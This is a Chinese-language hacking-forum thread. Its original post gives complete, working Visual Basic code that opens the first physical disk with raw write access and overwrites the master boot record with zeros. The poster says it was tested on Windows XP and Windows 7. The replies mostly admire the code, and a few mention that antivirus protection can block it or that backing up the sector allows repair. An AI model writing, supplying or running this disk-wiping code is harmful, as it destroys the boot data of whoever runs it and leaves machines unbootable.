[原创]纯VB在NT系统下破坏MBR

Tesla.Angela

以下代码在Windows XP和Windows 7 x86/x64上测试成功，原理是磁盘直接写入。

Option Explicit
Private Declare Function CreateFile Lib "kernel32.dll" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Private Declare Function SetFilePointer Lib "kernel32.dll" (ByVal hFile As Long, ByVal lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Private Declare Sub RtlZeroMemory Lib "kernel32.dll" (ByVal pDestination As Long, ByVal Length As Long)
Private Declare Function ReadFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function WriteFile Lib "kernel32.dll" (ByVal hFile As Long, ByVal lpBuffer As Long, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long

Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000
Private Const FILE_SHARE_READ As Long = &H1
Private Const FILE_SHARE_WRITE As Long = &H2
Private Const OPEN_EXISTING As Long = 3
Private Const INVALID_HANDLE_VALUE As Long = (-1)
Private Const FILE_BEGIN As Long = 0

Public Function main()
    Dim hFile As Long
    Dim buffer(511) As Byte
    Dim dwReadWrite As Long
    hFile = CreateFile("\\.\PhysicalDrive0", GENERIC_READ Or GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
    If (hFile <> INVALID_HANDLE_VALUE) Then
        Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
        Call ReadFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)
        Call SetFilePointer(hFile, 0, 0, FILE_BEGIN)
        Call RtlZeroMemory(VarPtr(buffer(0)), 512)
        Call WriteFile(hFile, VarPtr(buffer(0)), 512, dwReadWrite, 0)
        Call CloseHandle(hFile)
    End If
End Function

另附一份关于修改MBR的资料，可以拿去参考一下。

xiaoly99

无理由支持

HoviDelphic

篡改MBR的代码是在Ring 3的，我用VB实现了。

oopww

绝对膜拜。！！！
传说中的鬼影吗！？？！！
可以从MBR启动！？

oopww

汇编的代码早有了···叫什么红眼睛
只是没你说的R3的啊！！！！

Tesla.Angela

汇编的代码早有了···叫什么红眼睛
只是没你说的R3的啊！！！！
oopww 发表于 2010-7-25 18:42

CreateFileA+WriteFile

HoviDelphic

至于这份代码的后果是什么，我就不说了，实践出真知嘛，自己在真机上测试一下就行了。
PS：真的在真机上测试人的绝对是SB。

HoviDelphic

再次膜拜TA神牛
本网站最菜的人 发表于 2010-7-25 21:32

不要老是说这些虚伪的话。。。

xiaoly99

用不着测试了
看见"RtlZeroMemory"就知道会怎么样了
真是邪恶啊.......

xiaoly99

其实只要把WriteFile的Call注释掉就不会有这种后果了

HoviDelphic

用不着测试了
看见"RtlZeroMemory"就知道会怎么样了
真是邪恶啊.......
xiaoly99 发表于 2010-7-26 19:51

RtlZeroMemory只是清空本进程中buffer数组的值，这一步还没有破坏MBR。。。

HoviDelphic

其实只要把WriteFile的Call注释掉就不会有这种后果了
xiaoly99 发表于 2010-7-26 19:52

废话。。。

364589886

这个方法不一定可以成功。。。比如装了某些杀毒软件后，或者装了什么还原软件之类的。。。通常都会保护0扇区的

Tesla.Angela

回复 19# 364589886

废话。。。当然只能在无杀软的情况下。。。
随便一个ssdt hook就能禁止Ring 3写MBR了。

opboy45

请问楼主~
那能破坏~

能否修复呢？

Tesla.Angela

回复 opboy45 的帖子

在破坏之前先备份就行了。。。
反正不就是写512个字节么。。。

opboy45

回复 Tesla.Angela 的帖子

也对哦~
呵呵~

感谢楼主了~

F0-0

多谢分享

wenh7788

以前有搜索mbr木马的东西，当时在虚拟机运行测试了。反正每次都开启都提示一句英文就放在那里了。不知道现在还能搜到吗。

F0-0

学习一下